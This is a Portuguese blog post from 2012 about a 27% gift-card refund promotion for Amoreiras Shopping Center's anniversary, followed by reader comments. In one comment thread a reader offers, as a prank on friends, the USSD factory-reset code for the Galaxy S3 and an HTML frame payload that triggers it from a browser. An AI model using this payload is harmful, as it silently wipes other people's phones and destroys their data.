2012/09/25

Amoreiras com 27% de Desconto no 27º Aniversário

Se andam a adiar a compra de algum produto apetecível devido ao seu valor elevado, poderão querer aproveitar o 27º aniversário do Amoreiras Shopping. No próximo dia 27 de Setembro o Amoreiras Shopping Center comemora 27 anos, e vai "devolver" aos clientes 27% do valor das suas compras nesse dia.

Esse valor será carregado no Mundicenter Gift Card (MGC) em compras acumuladas iguais ou superiores a 100€ (excepto supermercado), sendo o prémio máximo por participação de 270€. (Sim, bem sei que é um valor que depois terão que gastar por lá, mas ainda assim é bem bom, digo eu!)

O cartão MGC encontra-se disponível no balcão de informações dos shoppings e pode ser utilizado em lojas de qualquer um dos seguintes centros comerciais: Amoreiras Shopping Center, Arena Shopping, Braga Parque, Odivelas Parque, Oeiras parque e Spacio Shopping.

A acompanhar este anviversário, o Amoreiras Shopping Center irá lançar um novo website, que passa a contar também com uma versão mobile. Este novo site apresenta uma série de novidades e possibilita também a compra de bilhetes para o cinema.


Ora... se fosse no dia 28 em vez do dia 27, bem que iria dar jeito a muitos interessados em arranjar um iPhone 5 com 27% de desconto! (Ainda assim, que vos parece a ideia de um Galaxy S3 com igual desconto? humm? :)


4 comentários:

  1. Para comprar um S3 mais vale ir ao groupon e assim é desconto direto.

    http://www.groupon.pt/deals/desconto-nacional/Groupon-Shopping-Samsung-Galaxy-S3-compras-pt/10659072

    ResponderEliminar
    Respostas
    1. Embora nunca tenha tido (grandes) azares no GroupOn, não me arriscaria a comprar um S3 numa loja "algueres" com preços milagrosos. Ao menos neste caso, tens uma loja física, perto de ti que sempre dá mais algum descanso na consciência (digo eu. :)

      Eliminar
  2. Viva

    LoL, e depois é fazer isto ao SGIII dos amigos:

    www.youtube.com/watch?v=Q2-0B04HPhs

    ou:
    the USSD code to factory data reset a Galaxy S3 is *2767*3855# can be triggered from browser like this:

    Ai se fosse num device Apple..., caía o Carmo e a Trindade... :)

    ResponderEliminar
    Respostas
    1. ... can be triggered from browser like this: frame src="tel:*2767*3855%23"

      Eliminar